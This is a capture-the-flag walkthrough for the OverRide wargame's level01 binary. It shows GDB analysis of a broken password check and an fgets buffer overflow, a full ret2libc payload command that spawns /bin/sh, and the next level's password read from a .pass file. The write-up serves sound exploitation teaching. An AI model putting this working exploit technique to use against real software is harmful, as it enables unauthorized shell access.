# Level01 — Walkthrough

## Overview

The `level01` binary asks for a username and a password. By analyzing the binary in GDB, we discover that the password check is broken (always fails regardless of input), but the password input buffer is vulnerable to a **buffer overflow**. We exploit this to redirect execution to `system("/bin/sh")` using a **ret2libc** attack.

---

## Step 1: Run the binary and observe its behavior

```
level01@OverRide:~$ ./level01
********* MUSIC MUSIC MUSIC *********
dat_wil
Verifying username....
Enter Password:
admin
nope, incorrect password...
```

The program asks for a username, then a password, and rejects us.

---

## Step 2: Analyze the binary protections

```
level01@OverRide:~$ readelf -l ./level01 | grep GNU_STACK
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x4
```

| Protection | Status | Impact |
|-----------|--------|--------|
| **Canary** | Disabled | No stack overflow detection |
| **NX** | Disabled (RWE) | Stack is executable — shellcode possible, but ret2libc is simpler |
| **PIE** | Disabled | Fixed addresses |
| **RELRO** | Partial | GOT is writable (not needed for this exploit) |

---

## Step 3: Disassemble `verify_user_name`

```
(gdb) disas verify_user_name
(gdb) x/s 0x80486a8
0x80486a8: "dat_wil"
```

The function compares the first 7 bytes of the global buffer `a_user_name` against `"dat_wil"` using `repz cmpsb`. The expected username is **`dat_wil`**.

---

## Step 4: Disassemble `verify_user_pass`

```
(gdb) disas verify_user_pass
(gdb) x/s 0x80486b0
0x80486b0: "admin"
```

The function compares the first 5 bytes of the password buffer against `"admin"`. The expected password is **`admin`**.

---

## Step 5: Discover the broken password check

Looking at the password check logic in `main`:

```asm
0x08048580 <+176>:   call   0x80484a3 <verify_user_pass>
0x08048585 <+181>:   mov    %eax,0x5c(%esp)       ; store result
0x08048589 <+185>:   cmpl   $0x0,0x5c(%esp)       ; if result == 0...
0x0804858e <+190>:   je     0x8048597 <main+199>  ; ...jump to FAILURE
0x08048590 <+192>:   cmpl   $0x0,0x5c(%esp)       ; if result == 0 (again)...
0x08048595 <+197>:   je     0x80485aa <main+218>  ; ...jump to SUCCESS
```

Both branches lead to the failure message:
- If `verify_user_pass` returns **0** (password matches) → first `je` is taken → failure message
- If it returns **non-zero** (password wrong) → first `je` not taken, second `je` also not taken → failure message

**The password check always fails regardless of input.** The correct password `admin` doesn't help. We need a different approach.

---

## Step 6: Identify the buffer overflow

```asm
0x08048565 <+149>:   movl   $0x64,0x4(%esp)       ; size = 100 bytes
0x0804856d <+157>:   lea    0x1c(%esp),%eax        ; buffer at esp+0x1c
0x08048574 <+164>:   call   0x8048370 <fgets@plt>  ; fgets(buffer, 100, stdin)
```

The password buffer starts at `esp + 0x1c` inside a stack frame of `0x60` (96 bytes). `fgets` reads up to **100 bytes**, which overflows past the buffer and overwrites the saved return address (EIP).

### Calculating the offset to EIP

```
Buffer at:     esp + 0x1c  (= ebp - 0x44)
Saved EBP at:  ebp + 0x00
Saved EIP at:  ebp + 0x04

Offset = 0x44 + 4 = 0x48 = 72 bytes (static)
```

However, `main` uses `and $0xfffffff0, %esp` for stack alignment, which adds extra padding. Testing with a cyclic pattern in GDB confirms the actual offset is **80 bytes**.

---

## Step 7: Find libc addresses in GDB

```
(gdb) b main
(gdb) run
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e6aed0 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7e5eb70 <exit>
(gdb) find &system,+9999999,"/bin/sh"
0xf7f897ec
```

| Component | Address | Little-endian bytes |
|-----------|---------|---------------------|
| `system()` | `0xf7e6aed0` | `\xd0\xae\xe6\xf7` |
| `exit()` | `0xf7e5eb70` | `\x70\xeb\xe5\xf7` |
| `"/bin/sh"` | `0xf7f897ec` | `\xec\x97\xf8\xf7` |

---

## Step 8: Build the ret2libc payload

The stack layout after overflow:

```
[80 bytes padding] [system addr] [exit addr] ["/bin/sh" addr]
                    ↑ EIP          ↑ return     ↑ argument
                    lands here     for system    to system
```

When `main` returns, it pops the overwritten EIP and jumps to `system()`. The x86 calling convention places the return address and first argument right after, so `exit` becomes `system`'s return address and `"/bin/sh"` becomes its argument.

---

## Step 9: Execute the exploit

```bash
(python -c 'print "dat_wil"; print "A"*80 + "\xd0\xae\xe6\xf7" + "\x70\xeb\xe5\xf7" + "\xec\x97\xf8\xf7"'; cat) | ./level01
```

Breaking this down:
- `print "dat_wil"` → correct username (passes `verify_user_name`)
- `print "A"*80` → 80 bytes of padding to reach EIP
- `"\xd0\xae\xe6\xf7"` → overwrites EIP with `system()`
- `"\x70\xeb\xe5\xf7"` → fake return address → `exit()`
- `"\xec\x97\xf8\xf7"` → argument to `system()` → `"/bin/sh"`
- `cat` → keeps stdin open for the shell

---

## Step 10: Get the flag

```
$ cat /home/users/level02/.pass
PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv
```

---

## Final exploit command

```bash
(python -c 'print "dat_wil"; print "A"*80 + "\xd0\xae\xe6\xf7" + "\x70\xeb\xe5\xf7" + "\xec\x97\xf8\xf7"'; cat) | ./level01
```

---

## Key concepts

| Concept | Role in the exploit |
|---|---|
| **Broken logic** | The password check always fails due to a compiler artifact — both branches lead to the failure path |
| **Buffer overflow** | `fgets` reads 100 bytes into a 64-byte stack buffer, overflowing past saved EBP/EIP |
| **Stack alignment** | `and $0xfffffff0, %esp` adds variable padding; the real offset (80) differs from the static calculation (72) |
| **ret2libc** | Overwrites EIP with `system()`, places `"/bin/sh"` as argument — no shellcode needed |
| **x86 calling convention** | After `ret`, the stack must contain: target address, return address, first argument |
| **Little-endian** | Addresses are written LSB-first: `0xf7e6aed0` → `\xd0\xae\xe6\xf7` |
| **GDB** | Used to find `system`, `exit`, and `"/bin/sh"` addresses in libc at runtime |
